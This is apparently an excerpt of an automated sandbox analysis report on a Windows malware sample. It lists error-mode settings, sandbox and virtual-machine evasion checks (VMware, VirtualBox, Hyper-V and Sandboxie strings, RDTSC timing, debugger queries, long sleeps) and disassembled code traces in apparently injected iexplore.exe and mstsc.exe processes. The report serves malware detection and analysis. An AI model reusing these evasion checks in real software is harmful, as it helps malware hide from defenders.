          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: #U0426#U0438#U0442#U0430#U0442#U0430.exe PID: 7532, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 2F99904 second address: 2F9990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 2F99B6E second address: 2F99B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory allocated: 21CCE320000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory allocated: 21CE7F50000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9828Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 3115Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 6540Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI coverage: 1.5 %
          Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 0.6 %
          Source: C:\Windows\explorer.exe TID: 4956Thread sleep time: -19656000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4956Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep count: 3115 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep time: -6230000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep count: 6540 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep time: -13080000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003626C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose,6_2_003626C7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003880BE GetSystemInfo,6_2_003880BE
          Source: Amcache.hve.4.drBinary or memory string: VMware
          Source: explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: explorer.exe, 00000005.00000002.4184525371.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4184525371.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3497000598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.000000000982D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D338000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.0000000003157000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.000000000313F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: explorer.exe, 00000005.00000000.1767281490.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000857000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWundaryDn$
          Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.4.drBinary or memory string: vmci.sys
          Source: explorer.exe, 00000005.00000002.4165873978.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.1767281490.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: explorer.exe, 00000005.00000002.4165873978.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000005.00000002.4184525371.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000005.00000003.3497000598.0000000009672000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: explorer.exe, 00000005.00000002.4189289247.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
          Source: explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000005.00000002.4165873978.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp/4]
          Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: msedge.exe, 00000021.00000002.2247156636.0000022408443000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2327431249.0000015D32243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000005.00000002.4184525371.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000005.00000002.4165873978.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000005.00000002.4189289247.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000005.00000000.1771305447.000000000CB15000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0040ACE0 LdrLoadDll,1_2_0040ACE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0038F581 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,6_2_0038F581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0040B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary,6_2_0040B05F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375437C mov eax, dword ptr fs:[00000030h]1_2_0375437C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376F367 mov eax, dword ptr fs:[00000030h]1_2_0376F367
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B7370 mov eax, dword ptr fs:[00000030h]1_2_036B7370
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B7370 mov eax, dword ptr fs:[00000030h]1_2_036B7370
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B7370 mov eax, dword ptr fs:[00000030h]1_2_036B7370
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377A352 mov eax, dword ptr fs:[00000030h]1_2_0377A352
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AD34C mov eax, dword ptr fs:[00000030h]1_2_036AD34C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AD34C mov eax, dword ptr fs:[00000030h]1_2_036AD34C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373035C mov eax, dword ptr fs:[00000030h]1_2_0373035C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373035C mov eax, dword ptr fs:[00000030h]1_2_0373035C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373035C mov eax, dword ptr fs:[00000030h]1_2_0373035C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373035C mov ecx, dword ptr fs:[00000030h]1_2_0373035C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373035C mov eax, dword ptr fs:[00000030h]1_2_0373035C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373035C mov eax, dword ptr fs:[00000030h]1_2_0373035C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03785341 mov eax, dword ptr fs:[00000030h]1_2_03785341
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9353 mov eax, dword ptr fs:[00000030h]1_2_036A9353
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9353 mov eax, dword ptr fs:[00000030h]1_2_036A9353
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03732349 mov eax, dword ptr fs:[00000030h]1_2_03732349
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DF32A mov eax, dword ptr fs:[00000030h]1_2_036DF32A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A7330 mov eax, dword ptr fs:[00000030h]1_2_036A7330
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377132D mov eax, dword ptr fs:[00000030h]1_2_0377132D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377132D mov eax, dword ptr fs:[00000030h]1_2_0377132D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EA30B mov eax, dword ptr fs:[00000030h]1_2_036EA30B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EA30B mov eax, dword ptr fs:[00000030h]1_2_036EA30B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EA30B mov eax, dword ptr fs:[00000030h]1_2_036EA30B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373930B mov eax, dword ptr fs:[00000030h]1_2_0373930B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373930B mov eax, dword ptr fs:[00000030h]1_2_0373930B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373930B mov eax, dword ptr fs:[00000030h]1_2_0373930B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AC310 mov ecx, dword ptr fs:[00000030h]1_2_036AC310
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D0310 mov ecx, dword ptr fs:[00000030h]1_2_036D0310
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037853FC mov eax, dword ptr fs:[00000030h]1_2_037853FC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C03E9 mov eax, dword ptr fs:[00000030h]1_2_036C03E9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C03E9 mov eax, dword ptr fs:[00000030h]1_2_036C03E9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C03E9 mov eax, dword ptr fs:[00000030h]1_2_036C03E9
